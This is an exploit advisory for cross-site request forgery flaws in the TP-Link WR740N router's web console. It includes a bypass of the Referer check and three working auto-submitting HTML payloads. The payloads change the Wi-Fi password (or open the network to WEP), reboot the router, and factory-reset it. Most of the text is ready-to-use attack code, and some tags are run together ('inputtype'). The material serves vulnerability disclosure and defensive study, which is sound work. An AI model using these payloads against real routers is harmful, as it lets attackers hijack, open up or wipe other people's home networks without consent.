# Exploit Title: TPLINK WR740N Multiple CSRF Vulnerabilities# Date: 11/24/2013# Author: SaMaN( @samanL33T )# Vendor Homepage: http://tplink.com# Category: Hardware/Wireless Router# Firmware Version: 3.16.6 Build 130529 Rel.47286n and below# Tested on: WR740N/WR740ND (May be possible on other models)---------------------------------------------------
Technical Details
~~~~~~~~~~~~~~~~~~
TPLINK WIreless Router WR740N has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router,Change Settings by simply making the user visit a CSRF link.
Application uses "HTTP-REFERER" check functionality to check for CSRF attacks. But it can easily be bypassed using the "Referer" parameter with value set to target's I.P in the GET request.
Exploit Code
~~~~~~~~~~~~~
Change WPA/WPA2 password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<html><body onload="document.form.submit();"><form action="http://[TARGET/IP]/userRpm/WlanSecurityRpm.htm"
method="GET" name="form"><inputtype="hidden" name="secType" value="3"><inputtype="hidden" name="pskSecOpt" value="3"><inputtype="hidden" name="pskCipher" value="3"><inputtype="hidden" name="pskSecret" value="[WPA/WPA2_PASSWORD]"><inputtype="hidden" name="interval" value="0"><inputtype="hidden" name="wpaSecOpt" value="3"><inputtype="hidden" name="wpaCipher" value="1"><inputtype="hidden" name="radiusIP" value=""><inputtype="hidden" name="rediusPort" value="1812"><inputtype="hidden" name="radiusSecret" value=""><inputtype="hidden" name="IntervalWpa" value="0"><inputtype="hidden" name="webSecOpt" value="1"><inputtype="hidden" name="keytype" value="1"><inputtype="hidden" name="keynum" value="1"><inputtype="hidden" name="key1" value=""><inputtype="hidden" name="length1" value="0"><inputtype="hidden" name="key2" value=""><inputtype="hidden" name="length2" value="0"><inputtype="hidden" name="key3" value=""><inputtype="hidden" name="length3" value="0"><inputtype="hidden" name="key4" value=""><inputtype="hidden" name="length4" value="0"><inputtype="hidden" name="Save" value="Save"><inputtype="hidden" name="Referer" value="http://[TARGET/IP]/"></form></body></html>#For Changing the Security to Open WEP, simply change "secType" value to 1.
Reboot Router by CSRF
~~~~~~~~~~~~~~~~~~~~~<html><body onload="document.form.submit();"><form action="http://[TARGET/IP]/userRpm/SysRebootRpm.htm"
method="GET" name="form"><inputtype="hidden" name="Reboot" value="Reboot"><inputtype="hidden" name="Referer" value="http://[TARGET/IP]/"></form></body></html>
Factory Reset the Router
~~~~~~~~~~~~~~~~~~~~~~~~<html><body onload="document.form.submit();"><form action="http://[TARGET/IP]/userRpm/RestoreDefaultCfgRpm.htm"
method="GET" name="form"><inputtype="hidden" name="Restorefactory" value="Restore"><inputtype="hidden" name="Referer" value="http://[TARGET/IP]/"></form></body></html>--
SaMaN
twitter : @samanL33T <https://twitter.com/samanL33T>
